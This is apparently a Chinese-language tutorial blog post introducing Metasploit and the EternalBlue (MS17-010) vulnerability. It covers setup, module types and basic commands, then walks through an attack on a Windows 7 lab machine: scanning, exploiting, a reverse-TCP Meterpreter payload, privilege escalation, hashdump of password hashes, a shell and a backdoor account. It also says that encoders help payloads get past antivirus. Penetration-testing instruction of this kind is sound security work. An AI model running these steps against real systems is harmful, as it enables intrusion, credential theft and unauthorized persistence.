- 每日一句:学习是一个循序渐进的过程,不要懈怠。
- 本篇内容:认识MSF和永恒之蓝
MSF的基础命令
漏洞利用基本流程
实战漏洞利用
一、认识MSF和永恒之蓝
1.定义
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具
我们能够通过它发现漏洞并进行快速实施攻击(需要在授权的情况下!)
//这款“美少妇”工具kali自带
2.使用
第一次使用MSF
开启数据库:service postgresql start
初始化msf数据库: msfdb init
开启MSF: msfconsole
注意:
~这是初始化msf的默认数据库,不然运行会比较慢
以后再使用的话,就直接开启msf即可
~MSF的启动漫画是随机的
二、MSF的基础命令
1.msf5的五大模块
~auxiliary 辅助模块
为渗透测试信息搜集提供了大量的辅助模块支持
命名规则:
操作系统/服务/名称
windows/smb/ms17_010_eternalblue
~Exploits 攻击模块
利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,
从而获得对远程目标系统访问权的代码组件。
~Payload 攻击载荷模块
攻击成功后促使靶机运行的一段植入代码
命名规则:
操作系统/类型/名称
windows/x64/meterpreter/reverse_tcp
~Post 后渗透攻击模块
收集更多信息或进一步访问被利用的目标系统
~Encoders 编码模块
将攻击载荷进行编码,来绕过防护软件拦截
2.常用命令
~help/? 帮助菜单
~exit 退出msf
~Back 返回
~show 显示所给类型的模块
例如:show auxiliary //查看辅助模块
补充:
~rank表示好用级别:
normal(正常),
excellent(优秀),
good(良好),
average(平均)
~数字
代表一种作用,可以直接用前边数字调用
~info 显示一个或者多个模块的信息
例如: info windows/smb/ms17_010_eternalblue
~search 寻找
例如:search ms17
~更新MSF:apt-get install metasploit-framework
三、漏洞利用基本流程
1.扫描靶机
use auxiliary/scanner/smb/smb_ms17_010 //使用辅助模块
进入此模块,输入options,
在这个下,我们可以看看我们需要设置哪些参数
( Required栏为“yes”的参数,要不是系统已经设置好的
要不就是需要我们设置的 )
例如 :我们设置rhosts, set rhosts 192.168.221.129
2.选择exploit
之后出现的结果,前边出现绿色的“[+]”且后边出现我们的目标IP
就说明我们可以进行攻击
back 返回上一级
use exploit/windows/smb/ms17_010_eternalblue
option看一下
set rhosts 192.168.221.129
3.选择payload
set payload windows/x64/meterpreter/reverse_tcp
options看一下(因为payload也需要设置配置)
set lhosts 192.168.221.133 //lhosts是本机IP
//设置之后,我们之前打进去的木马,就会来找我们的IP
4.攻击 exploit
5.提权 getsystem
6.枚举密码 hashdump //一般密码都是加密的
7.去拿个shell shell
8.查看权限 whoami
9.在尝试添加一个账户
net user admin admin /add
10.在看看所有用户 net user
//本次攻击靶机是win 7 sp1 //win 7 企业版
四、实战漏洞利用
1.正反向连接
~正向连接 : 我们去连接木马
~反向连接 : 木马来连接我们 //这个更稳定一些,且不太容易被拦截
2.不熟悉的话,多练习几遍
3.提权的原理
对面(目标)运行的一些程序具有高权限,
我们利用这个进程执行一些命令,以达到我么的目的
iis6.0de提权 建议百度一下
五、总结
- 理解KaLi-MSF的原理
- 熟悉MSF的基本命令
- 掌握漏洞利用基本流程